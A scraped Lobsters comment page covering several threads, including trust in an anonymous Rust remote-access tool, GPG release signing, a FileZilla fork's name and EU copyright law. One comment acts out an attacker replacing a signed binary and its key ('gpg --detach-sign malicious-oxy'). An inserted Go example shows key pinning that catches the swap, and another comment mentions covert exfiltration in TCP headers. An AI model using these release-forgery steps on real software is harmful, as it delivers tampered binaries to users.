                                                                                                    Now this is a perfectly reasonable concern. Had you raised the trustworthiness of the particular author of the software as your concern in your original comment to which I replied, I would never have replied, because that’s a legitimate concern.

                                                                                                    1. 1

                                                                                                      I pointed out the authors (whoever they are), never suggested you do this, and their instructions do not tell people to do that.

                                                                                                      Of course they didn’t. I was adding a figurative eye roll, which I’m pretty sure went right past you—I am sorry that I failed to make that more clear.

                                                                                                      Naturally, some number of people installing this software in the recommended way will want to copy this into /usr/bin, or /usr/local/bin, though. How many people blindly ./configure && make && sudo make install?

                                                                                                      On to the next point!

                                                                                                      package managers

                                                                                                      I am not upset by the fact that it’s not in a package manager. I am upset that it’s promoting a shitty practice, which has no auditability, no update mechanism, and no oversight whatsoever.

                                                                                                      Package managers are not perfect, as you have pointed out. However, they represent an additional check in the process for someone to think twice about including it, and, in doing so, take some responsibility, and a hit in reputation/ trust, when they do something that results in malware, or something else malicious. At least, that should be the case…

                                                                                                      trustworthiness of author

                                                                                                      It stands to reason that a person creating a security tool such as this, and claiming it is so much better than other solutions understands that the installation practice being described is controversial. This is at least doubly/quadruply true for a RAT tool.

                                                                                                      I see no reason why skepticism to the 10,000th degree isn’t being applied here…

                                                                                                      Have we all just given up on security? I mean…

                                                                                                      1. 3

                                                                                                        I see no reason why skepticism to the 10,000th degree isn’t being applied here…

                                                                                                        Have we all just given up on security? I mean…

                                                                                                        It is not too uncommon for the author of a piece of security software to want to remain anonymous.

                                                                                                        There is nothing wrong with expressing concern, but if you do it, it should be (a) a relevant/legitimate concern, and (b) balanced appropriately in the event that your suspicions of the project turn out to be misplaced. Someone out there did, after all, spend a lot of time putting effort into creating an allegedly improved, rustified RAT, and if their work is legitimate they deserve kudos for that.

                                                                                                        1. 2

                                                                                                          I’m one of the people that pushes “look at the work, not the author.” I’ll take software from the NSA if it’s rigorously vetted by 3rd parties I trust with a matching signature. That philosophy is what old security certifications tried to achieve on the highest levels. However, I do accept looking at the author as a heuristic for making quick decisions if not much else is available. One thing we see a lot in INFOSEC is people good at secure protocols have a track record of… writing secure code or protocols. They get good by publishing some work, getting it reviewed, often getting their asses handed to them, fixing it, and repeat. It might be shared more privately with instructors or fellow hackers doing the same process. There will be references, prior work, prior writings describing work… something to evaluate… for either their actual identity or the alias they stick with.

                                                                                                          The other heuristic is that unproven or unevaluatable people publishing new protocols get it wrong in security-breaking ways. This happens so much it should be assumed by default. Insecurity should be assumed by default anyway but especially with unknown developers. Again, the best route is evaluating the protocol and code itself. That said, people have a working protocol already with limited time on their hands. The heuristic might be used to save time by avoiding unestablished or unvetted authors’ work since 99+% of the time it will be broken anyway. In this case, avoiding work based on a strange author is about saving time and/or avoiding insecurity.

                                                                                                          So, there are two ways of looking at the unknown author that would lead one to avoid their work until someone with the right skills and spare time to donate evaluates it carefully.

                                                                                                          1. 3

                                                                                                            That’s certainly fair. I don’t really disagree with any of that. I’m not suggesting anyone feel like wasting their time, only that critiques be on-point and people not be berated for doing good work (if that’s what they did).

                                                                                                            Speaking of on-point critiques, I’m surprised nobody raised the concern that these releases are not GPG signed. That should be standard practice for all software, and certainly security-critical software.

                                                                                                            1. 1

                                                                                                              I’m surprised nobody raised the concern that these releases are not GPG signed.

                                                                                                              Unless this more or less anonymous person has a key signed by many trusted keys / people, how would that increase trust?

                                                                                                              My points above about package servers signing, or at least providing checksums, point at trust in the actual distributed assets. I may not trust the particular $SIGNER of a package, but I might trust others who trust $SIGNER, and accept that if $THEY trust $SIGNER, it’s probably OK for me to trust $SIGNER, too. That’s the model of the Web of Trust, and the model that every package server I know of (whether it be from freebsd, openbsd, or some random GNU/Linux distribution) works on.

                                                                                                              1. 1

                                                                                                                The point of GPG signing releases has nothing to do with web-of-trust.

                                                                                                                It is about establishing a direct line of trust to the author of the software to protect against third-party tampering. It doesn’t matter if they’re anonymous.

                                                                                                                1. 1

                                                                                                                  Yeah, agreed. I honestly think it’s quite frustrating how GPG entangles web-of-trust with its other features. It creates a lot of confusion.

                                                                                                                  1. 2

                                                                                                                    @itistoday, earlier in this long thread you suggest:

                                                                                                                    Which, incidentally, has the exact same trust assumptions (X.509) as the downloaded binary.

                                                                                                                    (To be clear: this was in response to download the binary, vs download the source and compile the binary)

                                                                                                                    So, you trust the author’s X.509 certificate enough to assume it’s not tampered with on download, but don’t trust that the author put it there in the first place? And who even has the authority to make a release? We don’t know! So, we still have to be suspicious even if it’s signed.

                                                                                                                    Let’s discuss this scenario:

                                                                                                                    I’m a l33t h4x0r and I pwn3d oxy-secure.app’s servers. I want to put a rogue oxy up there. Since the key that signed the old oxy binary is just a one-off anyway (because it’s unknown to everyone), I’ll sign my malicious oxy binary with a one-off key, too, and update the HTML referencing how to get this new key! My l33t social engineering skills suggest that I should use the same email address and, for the name, use “Original Name - NEW KEY” (or something else that implies I’m still the same person, I just made a mistake).

                                                                                                                    $ gpg --gen-key                   # fresh one-off key, same e-mail, name "Original Name - NEW KEY"
                                                                                                                    ...
                                                                                                                    $ gpg --detach-sign malicious-oxy # writes the separate signature file that replaces the original one
                                                                                                                    

                                                                                                                    I replace https://oxy-secure.app/oxy , and the signature file with my malicious ones, and even publish my new public key somewhere, and no one is the wiser! (I then twist my handlebar mustache, and let out an evil snicker)

                                                                                                                    NOW, if, as a user, I happened to import the previous signing key, I might notice that this is different and it might raise some eyebrows. Just like I might notice that the SSL cert’s fingerprint changed as it started pointing to my server oxy-notsosecure.app/oxy… But, given this author is unknown, I also might not bat an eye at my plausible explanation of: “oh, what an idiot! They forgot to back up their key!”

                                                                                                                    If I’m being fair, yes, a signed binary, even with an unestablished key can help here. It introduces additional levels of potential doubt at the authenticity of the binary. But, even if the original oxy is signed, I’m still taking a giant risk by accepting the fact that I’m downloading a random binary from the internet built by some random anonymous person, and they may (or may not) have malicious intent, or not have the skills to back up the claims they’ve made (in the case where it’s actually not malicious intent).

                                                                                                                    If the key is known to other people I know, as it’s part of the web of trust, it’s a little easier to believe that the risk is less malicious intent and more, “the author might still be making exuberant claims.”
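The key-replacement scenario above is easy to reproduce. The following is an added example, not code from this thread or from the oxy project: it uses Ed25519 from Go’s standard library as a stand-in for GPG, with constructed keys and artifacts. It shows that checking a signature against whatever key the download site currently advertises accepts the attacker’s self-consistent forgery, while pinning the fingerprint recorded on first contact rejects it and forces the “they forgot to back up their key” conversation to happen out of band. `Fingerprint`, `Release` and `RunScenario` are names chosen here, not anything from GPG or oxy.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
)

// Release is everything a download site hands out: the artifact, a detached
// signature over it, and whatever public key the site currently advertises.
type Release struct {
	Artifact  []byte
	Signature []byte
	SiteKey   ed25519.PublicKey
}

// Fingerprint stands in for the GPG key fingerprint a user records out of band
// (first 16 hex chars of SHA-256 over the raw public key; a constructed format).
func Fingerprint(pub ed25519.PublicKey) string {
	sum := sha256.Sum256(pub)
	return hex.EncodeToString(sum[:8])
}

// VerifyAgainstSite is the naive check: believe whatever key the site serves
// next to the binary. It only proves the signer held the key the site points to.
func VerifyAgainstSite(r Release) bool {
	return ed25519.Verify(r.SiteKey, r.Artifact, r.Signature)
}

// VerifyPinned is the careful check: the advertised key must match the
// fingerprint pinned on first contact, and the signature must verify under it.
func VerifyPinned(r Release, pinnedFingerprint string) error {
	if got := Fingerprint(r.SiteKey); got != pinnedFingerprint {
		return fmt.Errorf("signing key changed (%s != pinned %s); treat as tampering until explained out of band", got, pinnedFingerprint)
	}
	if !ed25519.Verify(r.SiteKey, r.Artifact, r.Signature) {
		return errors.New("signature does not verify under the pinned key")
	}
	return nil
}

// Outcome records how each check judges the genuine and the forged release.
type Outcome struct {
	GenuinePinned error // genuine release under the pinned key: expected nil
	ForgedSiteOK  bool  // forged release against the site's current key: expected true
	ForgedPinned  error // forged release under the pinned key: expected non-nil
}

// RunScenario replays the thread's attack with constructed keys and artifacts.
func RunScenario() (Outcome, error) {
	authorPub, authorPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return Outcome{}, err
	}
	genuine := []byte("oxy release (constructed stand-in for the real binary)")
	original := Release{
		Artifact:  genuine,
		Signature: ed25519.Sign(authorPriv, genuine),
		SiteKey:   authorPub,
	}
	pinned := Fingerprint(authorPub) // the user records this on first download

	// The attacker owns the server: new one-off key, new binary, new signature,
	// and the new key published next to it, all self-consistent.
	attackerPub, attackerPriv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return Outcome{}, err
	}
	malicious := []byte("oxy release with a backdoor (constructed)")
	forged := Release{
		Artifact:  malicious,
		Signature: ed25519.Sign(attackerPriv, malicious),
		SiteKey:   attackerPub,
	}

	return Outcome{
		GenuinePinned: VerifyPinned(original, pinned),
		ForgedSiteOK:  VerifyAgainstSite(forged),
		ForgedPinned:  VerifyPinned(forged, pinned),
	}, nil
}

func main() {
	out, err := RunScenario()
	if err != nil {
		panic(err)
	}
	fmt.Println("genuine release, pinned key:", out.GenuinePinned)
	fmt.Println("forged release, key served by site:", out.ForgedSiteOK)
	fmt.Println("forged release, pinned key:", out.ForgedPinned)
}
```

The point of `VerifyPinned` is that the fingerprint comparison happens before the signature check: a signature that verifies under an unpinned key is exactly the situation the scenario above exploits, so it is reported as a key change, not as a success.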

                                                                                                          2. 1

                                                                                                            This is no longer productive, and I am taking your response as:

                                                                                                            a) my concern is irrelevant b) I’ll have egg on my face when this turns out to be the RAT that saves us all.

                                                                                                            In response, I am just going to invite you to @akpoff’s well written comment, which also expresses concerns. Maybe they are more “relevant”: https://lobste.rs/s/3hrwqf/oxy_security_focused_remote_access_tool#c_0hsv4p

                                                                                              1. 4

                                                                                                Adding an obvious link to the github page I think would also make a worthwhile addition. It wasn’t until reading the comments here on lobste.rs that I realized this was open source. I was assuming I had to take the author’s word for it when they said it was written in rust etc.

                                                                                                For the record, here’s the github page if anyone else fell victim: https://github.com/oxy-secure/oxy

                                                                                                1. 2

                                                                                                  I was assuming I had to take the author’s word for it when they said it was written in rust etc.

                                                                                                  This sounds like a dangerous mindset. Rust is likely a safer language for writing software that talks to the network than, say, C. However, which language it’s written in has no bearing on the numerous claims it makes about its security and stature as a “secure” RAT…well, other than the memory safety claim…assuming it doesn’t use unsafe anywhere, of course.

                                                                                                  1. 0

                                                                                                    Calm down broham. I don’t believe everything I read on the Internet.

                                                                                                1. 17

                                                                                                  You’d save yourself a lot of trouble upfront by not borrowing the filezilla name - it’s trademarked. Already there’s an argument for whether the “-ng” postfix constitutes a new mark, so why bother even having it? Just completely rename it.

                                                                                                  Hilariously their trademark policy seems to prohibit their use of their own name

                                                                                                  1. 3

                                                                                                    Oh, great point. We will need to think of a new name.

                                                                                                    How about godzilla-ftp.

                                                                                                    1. 14

                                                                                                      How about filemander? It’s still in the same vein as “zilla,” but far more modest. The fact that you’re refusing cruft provides a sense of modesty.

                                                                                                      Also, “mander” and “minder” — minder maybe isn’t exactly right for an FTP client, but it’s not completely wrong…

                                                                                                      1. 4

                                                                                                        filemander

                                                                                                        Great name! A quick ddg search does not show any existing projects using it.

                                                                                                        1. 1

                                                                                                          And it sounds a bit like “fire mander”, which ties in well with the mythological connections between salamanders and fire.

                                                                                                          1. 1

                                                                                                            Yeah, the intention was to have a cute salamander logo–way more modest a lizard than a “SOMETHINGzilla!”

                                                                                                        2. 8
                                                                                                          1. 5

                                                                                                            Just remember to make sure it’s easy for random people to remember and spell. They’ll be Googling it at some point.

                                                                                                        1. 6

                                                                                                          Team lobste.rs, @lattera, @nickpsecurity?

                                                                                                          1. 5

                                                                                                            Haha. I would love it if I had the time to play. Perhaps next year. Thanks for the ping, though. I’ve forwarded this on to a few of my coworkers who play CTFs.

                                                                                                            1. 4

                                                                                                              I’d love to if I hadn’t lost my memory, including of hacking, to that injury. I never relearned it since I was all-in with high-assurance security at that point which made stuff immune to almost everything hackers did. If I still remembered, I’d have totally been down for a Lobsters hacking crew. I’d bring a dozen types of covert channels with me, too. One of my favorite ways to leak small things was putting it in plain text into TCP/IP headers and/or throttling of what otherwise is boring traffic vetted by NIDS and human eye. Or maybe in HTTPS traffic where they said, “Damn, if only I could see inside it to assess it” while the data was outside encoded but unencrypted. Just loved doing the sneakiest stuff with the most esoteric methods I could find with much dark irony.

                                                                                                              I will be relearning coding and probably C at some point in future to implement some important ideas. I planned on pinging you to assess the methods and tooling if I build them. From there, might use it in some kind of secure coding or code smashing challenge.

                                                                                                              1. 5

                                                                                                                I’m having a hard time unpacking this post, and am really starting to get suspicious of who you are, nickpsecurity. Maybe I’ve missed some background posts of yours that explains more, and provides better context, but this comment (like many others) comes off…almost Markovian (as in chain).

                                                                                                                “If I hadn’t lost my memory…” — of all the people on Lobsters, you seem to have the best recall. You regularly cite papers on a wide range of formal methods topics, old operating systems, security, and even in this post discuss techniques for “hacking” which, just sentences before “you can’t remember how to do.”

                                                                                                                You regularly write essays as comments…some of which are almost tangential to the main point being made. These essays are cranked out at a somewhat alarming pace. But I’ve never seen an “authored by” submitted by you pointing outside of Lobsters.

                                                                                                                You then claim that you need to relearn coding, and “probably C” to implement important ideas. I’ve seen comments recently where you ask about Go and Rust, but would expect, given the number of submissions on those topics specifically, you’d have wide ranging opinions on them, and would be able to compare and contrast both with Modula, Ada, and even Oberon (languages that I either remember you discussing, or come from an era/industry that you often cite techniques from).

                                                                                                                I really, really hate to have doubt about you here, but I am starting to believe that we’ve all been had (don’t get me wrong, we’ve all learned things from your contributions!). As far as I’ve seen, you’ve been incredibly vague with your background (and privacy is your right!). But, that also makes it all the more easy to believe that there is something fishy with your story…

                                                                                                                1. 11

                                                                                                                  I’m not hiding much past what’s private or activates distracting biases. I’ve been clear when asked on Schneier’s blog, HN, maybe here that I don’t work in the security industry: I’m an independent researcher who did occasional gigs if people wanted me to. I mostly engineered prototypes to test my ideas. Did plenty of programming and hacking when younger for the common reasons and pleasures of it. I stayed in jobs that let me interact with lots of people. Goal was social research and outreach on big problems of the time like a police state forming post-9/11 which I used to write about online under aliases even more than tech. I suspected tech couldn’t solve the problems created by laws and media. Had to understand how many people thought, testing different messages. Plus, jobs allowing lots of networking mean you meet business folks, fun folks, you name it. A few other motivations, too.

                                                                                                                  Simultaneously, I was amassing as much knowledge as I could about security, programming, and such trying to solve the hardest problems in those fields. I gave up hacking since its methods were mostly repetitive and boring compared to designing methods to make hacking “impossible.” Originally a mix of public benefit and ego, I’d try to build on work by folks like Paul Karger to beat the world’s brightest people at their game one root cause at a time until a toolbox of methods and proven designs would solve the whole problem. I have a natural, savant-like talent for absorbing and integrating tons of information but a weakness for focusing on doing one thing over time to mature implementation. One is exciting, one is draining after a while. So, I just shared what I learned with builders as I figured it out with lots of meta-research. My studies of work of master researchers and engineers aimed to solve both individual solutions in security/programming (eg secure kernels or high-productivity) on top of looking for ways to integrate them like a unified, field theory of sorts. Wise friends kept telling me to just build one or more of these to completion (“focus Nick!”). Probably right but I’d have never learned all I have if I did. What you see me post is what I learned during all the time I wasn’t doing security consulting, building FOSS, or something else people pushed.

                                                                                                                  Unfortunately, right before I started to go for production stuff beyond prototypes, I took a brain injury in an accident years back that cost me most of my memory, muscle memory, hand-eye coordination, reflexes, etc. Gave me severe PTSD, too. I can’t remember most of my life. It was my second, great tragedy after a triple HD failure in a month or two that cost me my data. All I have past my online writings are mental fragments of what I learned and did. Sometimes I don’t know where they came from. One of the local hackers said I was the Jason Bourne of INFOSEC: didn’t know shit about my identity or methods but what’s left in there just fires in some contexts for some ass-kicking stuff. I also randomly retain new stuff that builds on it. Long as it’s tied to strong memories, I’ll remember it for some period of time. The stuff I write-up helps, too, which mostly went on Schneier’s blog and other spaces since some talented engineers from high-security were there delivering great peer review. Made a habit out of what worked. I put some on HN and Lobsters (including authored by’s). They’re just text files on my computer right now that are copies of what I told people or posted. I send them to people on request.

                                                                                                                  Now, a lot of people just get depressed, stop participating in life as a whole, and/or occasionally kill themselves. I had a house to keep in a shitty job that went from a research curiosity to a necessity since I didn’t remember admining, coding, etc. I tried to learn C# in a few weeks for a job once like I could’ve before. Just gave me massive headaches. It was clear I’d have to learn a piece at a time like I guess is normal for most folks. I wasn’t ready to accept it plus had a job to re-learn already. So, I had to re-learn the skills of my existing job (thank goodness for docs!), some people stuff, and so on to survive while others were trying to take my job. Fearing discrimination for disability, I didn’t even tell my coworkers about the accident. I just let them assume I was mentally off due to stress many of us were feeling as Recession led to layoffs in and around our households. I still don’t tell people until after I’m clearly a high-performer in the new context. Pointless since there’s no cure they could give but plenty of downsides to sharing it.

                                                                                                                  I transitioned out of that to other situations. Kind of floated around keeping the steady job for its research value. Drank a lot since I can’t choose what memories I keep and what I have goes away fast. A lot of motivation to learn stuff if I can’t keep it, eh? What you see are stuff I repeated the most for years on end teaching people fundamentals of INFOSEC and stuff. It sticks mostly. Now, I could’ve just piece by piece relearned some tech in a focused area, got a job in that, built up gradually, transitioned positions, etc… basically what non-savants do is what I’d have to do. Friends kept encouraging that. Still had things to learn talking to people especially where politics were going in lots of places. Still had R&D to do on trying to find the right set of assurance techniques for right components that could let people crank out high-security solutions quickly and market competitive. All the damage in media indicated that. Snowden leaks confirmed most of my ideas would’ve worked while most of security community’s recommendations not addressing root causes were being regularly compromised as those taught me predicted. So, I stayed on that out of perceived necessity that not enough people were doing it.

                                                                                                                  The old job and situation are more a burden now than useful. Sticking with it to do the research cost me a ton. I don’t think there’s much more to learn there. So, I plan to move on. One, social project failed in unexpected way late last year that was pretty depressing in its implications. I might take it up again since a lot of people might benefit. I’m also considering how I might pivot into a research position where I have time and energy to turn prior work into something useful. That might be Brute-Force Assurance, a secure (thing here), a better version of something like LISP/Smalltalk addressing reasons for low uptake, and so on. Each project idea has totally different prerequisites that would strain my damaged brain to learn or relearn. Given prior work and where tech is at, I’m leaning most toward a combo of BFA with a C variant done more like live coding, maybe embedded in something like Racket. One could rapidly iterate on code that extracted to C with about every method and tool available thrown at it for safety/security checks.

                                                                                                                  So, it’s a mix of indecision and my work/life leaving me feeling exhausted all the time. Writing up stuff on HN, Lobsters, etc about what’s still clear in my memory is easy and rejuvenating in comparison. I also see people use it on occasion with some set to maybe make waves. People also send me emails or private messages in gratitude. So, probably not doing what I need to be doing but folks were benefiting from me sharing pieces of my research results. So, there it is all laid out for you. A person outside security industry going Ramanujan on INFOSEC and programming looking for its UFT of getting shit done fast, correct, and secure (“have it all!”) while having day job(s) about meeting, understanding, and influencing people for protecting or improving democracy. Plus, just the life experiences of all that. It was fun while it lasted. Occasionally so now but more rare.

                                                                                                                  1. 4

                                                                                                                    Thank you for sharing your story! It provides a lot of useful context for understanding your perspective in your comments.

                                                                                                                    Putting my troll hat on for a second, what you’ve written would also make a great cover story if you were a human/AI hybrid. Just saying. :)

                                                                                                                    1. 1

                                                                                                                      Sure. I’m strange and seemingly contradictory enough that I expect confusion or skepticism. It makes sense for people to wonder. I’m glad you asked since I needed to do a thorough writeup on it to link to vs scattered comments on many sites.

                                                                                                                  2. 0

                                                                                                                    I have to admit similar misgivings (unsurprisingly, I came here via @apg and know @apg IRL). For someone so prolific and opinionated you have very little presence beyond commenting on the internet. To me, that feels suspicious, but who knows. I’m actually kind of hoping you’re some epic AI model and we’re the test subjects.

                                                                                                                    1. 0

                                                                                                                      Occam’s Razor applies. ‘A very bright human bullshitter’ is more likely than somebody’s research project.

                                                                                                                      @nickpsecurity, have you considered “I do not choose to compete” instead of “If only I hadn’t had that memory loss”?

                                                                                                                      I, for one, will forgive and forget what I’ve seen so far. (TBH, I’m hardly paying attention anyway.)

                                                                                                                      But, lies have a way of growing, and there is some line down the road where forgive-and-forget becomes GTFO.

                                                                                                                      1. 1

                                                                                                                        have you considered “I do not choose to compete” instead of “If only I hadn’t had that memory loss”?

                                                                                                                        I did say the way my mind works makes it really hard to focus on long-term projects to completion. Also, I probably should’ve been doing some official submissions in ACM/IEEE but polishing and conferencing was a lot of work distracting from the fun/important research. If I’m reading you right, it’s accurate to say I wasn’t trying to compete in academia, market, or social club that is the security industry on top of memory loss. I was operating at a severe handicap. So, I’d (a) do those tedious, boring, distracting, sometimes-political things with that handicap or (b) keep doing what I was doing, enjoying, and provably good at despite my troubles. I kept going with (b).

                                                                                                                        That was the decision until recently when I started looking at doing some real, public projects. Still in the planning/indecision phase on that.

                                                                                                                        “But, lies have a way of growing, and there is some line down the road where forgive-and-forget becomes GTFO.”

                                                                                                                        I did most of my bullshitting when I was a young hacker trying to get started. Quite opposite of your claim, the snobby, elitist, ego-centered groups I had to start with told you to GTFO by default unless you said what they said, did what they expected, and so on. I found hacker culture to be full of bullshit beliefs and practices with no evidence backing them. That’s true to this day. Just getting in to few opportunities I had required me to talk big… being a loud wolf facing other wolves… plus deliver on a lot of it just to not be filtered. I’d have likely never entered INFOSEC or verification otherwise. Other times have been personal failures that required humiliating retractions and apologies when I got busted. I actually care about avoiding unnecessary harm or aggravation to decent people. I’m sure more failures will come out over time with them costing me but there will be a clear difference between old and newer me. Since I recognize my failure there, I’m focusing on security BSing for rest of comment since it’s most relevant here.

                                                                                                                        The now, especially over the past five years or so, has been me sharing hard-won knowledge with people with citations. Most of the BS is stuff security professionals say without evidence that I counter with evidence. Many of their recommendations got trashed by hackers with quite a few of mine working or working better. Especially on memory safety, small TCB’s, covert channels, and obfuscation. I got much early karma on HN in particular mainly countering BS in fads, topics/people w/ special treatment, echo chambers, and so on. My stuff stayed greyed out but I had references. They usually got upvoted back by the evening. To this day, I get emails thanking me for doing what they said they couldn’t since any dissenting opinion on specific topics or individuals would get slammed. My mostly-civil, evidence-based style survived. Some BS actually declined a bit since we countered it so often. Just recently had to counter a staged comparison here which is at 12 votes worth of gratitude, high for HN dissenters. The people I counter include high-profile folks in the security industry who are totally full of shit on certain topics. Some won’t relent no matter how concrete the evidence is since it’s a game or something to them. Although I get ego out of being right, I mainly do this since I think safe, secure systems are a necessary, public good. I want to know what really works, get that out there, and see it widely deployed.

                                                                                                                        If anything, I think my being a bullshitting hacker/programmer early on was a mix of justified and maybe overdoing it vs a flaw I should’ve avoided. I was facing locals and an industry that’s more like a fraternity than meritocracy, itself constantly reinforcing bullshit and GTFO’ing dissenters. With my learning abilities and obsession, I got real knowledge and skills pretty quickly switching to current style of just teaching what I learned in a variety of fields with tons of brainstorming and private research. Irritated by constant BS, I’ve swung way in the other direction by constantly countering BS in IT/INFOSEC/politics while being much more open about personal situation in ways that can cost me. I also turned down quite a few jobs offers for likely five to six digits telling them I was a researcher “outside of industry” who had “forgotten or atrophied many hands-on skills.” I straight-up tell them I’d be afraid to fuck up their systems by forgetting little, important details that only experience (and working memory) gives you. Mainly admining or networking stuff for that. I could probably re-learn safe/secure C coding or something enough to not screw up commercial projects if I stayed focused on it. Esp FOSS practice.

                                                                                                                        So, what do you think? I had justification for at least some of my early bullshit quite like playing the part for job interviews w/ HR drones? Or should’ve been honest enough that I never learned or showed up here? There might be middle ground but that cost seems likely given past circumstances. I think my early deceptions or occasional fuckups are outweighed by the knowledge/wisdom I obtained and shared. It definitely helped quite a few people whereas talking big to gain entry did no damage that I can tell. I wasn’t giving bad advice or anything: just a mix of storytelling with letting their own perceptions seem true. Almost all of them are way in my past. So, really curious what you think of how justified someone entering a group of bullshitters with arbitrary, filtering criteria is in out-bullshitting and out-performing them to gain useful knowledge and skills? That part specifically.

                                                                                                                        1. 2

                                                                                                                          As a self-piloted, ambulatory tower of nano machines inhabiting the surface of a wet rock hurtling through outer space, I have zero time for BS in any context. Sorry.

                                                                                                                          I do have time for former BSers who quit doing it because they realized that none of these other mechanical wonders around them are actually any better or worse at being what they are. We’re all on this rock together.

                                                                                                                          p.s. the inside of the rock is molten. w t actual f? :D

                                                                                                                          1. 2

                                                                                                                            Actually, come to think of it, I will sit around and B.S. for hours, in person with close friends, for fun. Basically just playing language games that have no rules. It probably helps that all the players love each other. That kind of BS is fine.

                                                                                                                            1. 1

                                                                                                                              I somehow missed this comment before or was dealing with too much stuff to respond. You and I may have some of that in common since I do it for fun. I don’t count that as BS people want to avoid so much as just entertainment since I always end with a signal it’s bullshit. People know it’s fake unless tricking them is part of our game, esp if I owe them a “Damnit!” or two. Even then, it’s still something we’re doing voluntarily for fun.

                                                                                                                              My day-to-day style is a satirist like popular artists doing controversial comedy or references. I just string ideas together to make people laugh, wonder, or shock them. Same skill that lets me mix and match tech ideas. If shocking stuff bothers them, tone it way down so they’re as comfortable as they let others be. Otherwise, I’m testing their boundaries with stuff making them react somewhere between hysterical laughter and “Wow. Damn…” People tell me I should Twitter the stuff or something. Prolly right again but haven’t done it. Friends and coworkers were plenty fun to entertain without any extra burdens.

                                                                                                                              One thing about sites like this is staying civil and informational actually makes me hide that part of my style a lot since it might piss a lot of people off or risk deleting my account. I mostly can’t even joke here since it just doesn’t come across right. People interpret via impression those informational or political posts gave vs my in-person, satirical style that heavily leans on non-tech references, verbal delivery, and/or body language. Small numbers of people face-to-face instead of a random crowd, too, most of the time. I seem to fit into that medium better. And trying to be low-noise and low-provocation on this site in particular since I think it has more value that way.

                                                                                                                              Just figured I’d mention that since we were talking about this stuff. I work in a pretty toxic environment. In it, I’m probably the champion of burning jerks with improv and comebacks. Even most naysayers pay attention with their eyes and some smirks saying they look forward to next quip. I’m a mix of informative, critical, random entertainment, and careful boundary pushing just to learn about people. There’s more to it than that. Accurate enough for our purposes I think.

                                                                                                                            2. 1

                                                                                                                              Lmao. Alright. We should get along fine then given I use this site for brainstorming, informing, and countering as I described. :)

                                                                                                                              And yeah it trips me out that life is sitting on a molten, gushing thing being supplied energy by piles of hydrogen bombs going off in a space set to maybe expand into our atmosphere at some point. That is if a stray star doesn’t send us whirling out of orbit. Standing in the way of all of this is the ingenuity of what appear to be ants on a space rock whose combined brainpower got a few off of it and then back on a few times. They have plans for their pet rock. Meanwhile, they scurry around on it making all kinds of different visual, IR, and RF patterns for space tourists to watch for a space buck a show.

                                                                                                                1. 34

                                                                                                                  Please don’t. When learning you make a lot of mistakes, and writing a tutorial with these mistakes doesn’t help other learners when they read it.

                                                                                                                  1. 12

                                                                                                                    And even if you don’t make mistakes, most people will misunderstand their own process and come up with unhelpful things like monad tutorials: https://byorgey.wordpress.com/2009/01/12/abstraction-intuition-and-the-monad-tutorial-fallacy/

                                                                                                                    But now Joe goes and writes a monad tutorial called “Monads are Burritos,” under the well-intentioned but mistaken assumption that if other people read his magical insight, learning about monads will be a snap for them.

                                                                                                                    1. 7

                                                                                                                      Came here to say something similar to this.

                                                                                                                      Learn new technology through writing a tutorial about it, but don’t publish it.

                                                                                                                      There’s so much misinformation by well-intentioned learners.

                                                                                                                      I’m not trying to diminish the importance of journaling either! Journaling != Tutorials.

                                                                                                                      1. 7

                                                                                                                        Publishing your tutorial gives it an audience, which means someone may (hopefully!) come along and correct you on your errors. This is invaluable.

                                                                                                                        I also disagree with this negativity. Make it clear at the top of your tutorial that you’re a beginner and you may not have it all right. But with that caveat, publish away.

                                                                                                                        1. 3

                                                                                                                          I think we’re discussing the same thing but disagreeing on the semantics of it.

                                                                                                                          • Belief #1: Sharing how you learned something can be a valuable tool to someone else.
                                                                                                                          • Belief #2: Tutorials can seem like they’re from a source of authority, so a lack of a disclaimer could be hazardous.
                                                                                                                          • Belief #3: Imposter syndrome is real. We need to mitigate misinformation, but not at the expense of people being afraid to share.
                                                                                                                          1. 1

                                                                                                                            Publishing your tutorial gives it an audience, which means someone may (hopefully!) come along and correct you on your errors. This is invaluable.

                                                                                                                            Absolutely invaluable, but at the very same time, the exposure spreads the misinformation to more readers, potentially doing more harm than good. I don’t think a disclaimer is enough. I think the word “tutorial” implies some authority, unfortunately.

                                                                                                                            I think a better way is to humbly share a report of your findings so far, with questions and an (as appropriate) admission that you don’t understand everything. Julia Evans is masterful at this style.

                                                                                                                            As a reader new to the topic, you get the benefit of an explanation of what she currently understands (which is often from a beginner’s mind), and usually some questions to seek answers to on your own. As an expert of the topic, you are invited to share more, or clarify, or correct (and this happens a lot on twitter, and/or HN, etc). But you’re doing so from a place of empathy (you want to be helpful) instead of from a place of disgust (ugh! why is this tutorial so bad!).

                                                                                                                      1. -5

                                                                                                                        It is only a disaster if your business relies on making use of other people’s work, in which they own the copyright.

                                                                                                                        Not everybody can afford to create stuff and give it away for free, and there are plenty of people who want to earn money from their creative work.

                                                                                                                        Those who have made a living from stealing other people’s material are up in arms that their free lunch is not going to be free anymore.

                                                                                                                        1. 17

                                                                                                                          Or you run any kind of site where users can input anything that another visitor can see. Not just video and file sharing sites; Lobsters users could paste copyrighted content into a comment/PM and I’d be liable for not having a system implementing some kind of copyright controls.

                                                                                                                          (To say nothing of Article 11 wanting us to start paying the news sites we link to for privilege of sending them traffic.)

                                                                                                                          1. -2

                                                                                                                            If somebody posted something here that I owned the copyright to, and I asked Lobsters admin to remove the material, then I imagine they would. If somebody kept posting this material they could be banned.

                                                                                                                            Or are you saying that the Lobsters’ site should be a place where anybody can post copyright material, without any recourse by the copyright holder?

                                                                                                                            1. 13

                                                                                                                              The new law changes this standard safe harbor behavior. Lobsters (me) is presumptively at fault for copyright infringement for not proactively checking for possibly-copyrighted material before posting. So yes, your scenario is the current, reasonable law and accurately describes why everyone is concerned about this change.

                                                                                                                              1. -2

                                                                                                                                Lots of FUD being generated by those who will lose out. Copyright holders are not making much noise about the fact they will probably make some money (or rather lose less).

                                                                                                                                Some good points about what is going on.

                                                                                                                              2. 4

                                                                                                                                The law isn’t about that, though. The new law doesn’t say admins must take-down on request (that’s already the case under existing law) but rather that they must have an AI system that prevents any infringing uploads from happening in the first place.

                                                                                                                                The link tax is a much bigger problem, especially for Lobsters, but both articles are very bad.

                                                                                                                                1. 1

                                                                                                                                  AI system that prevents any infringing uploads from happening in the first place.

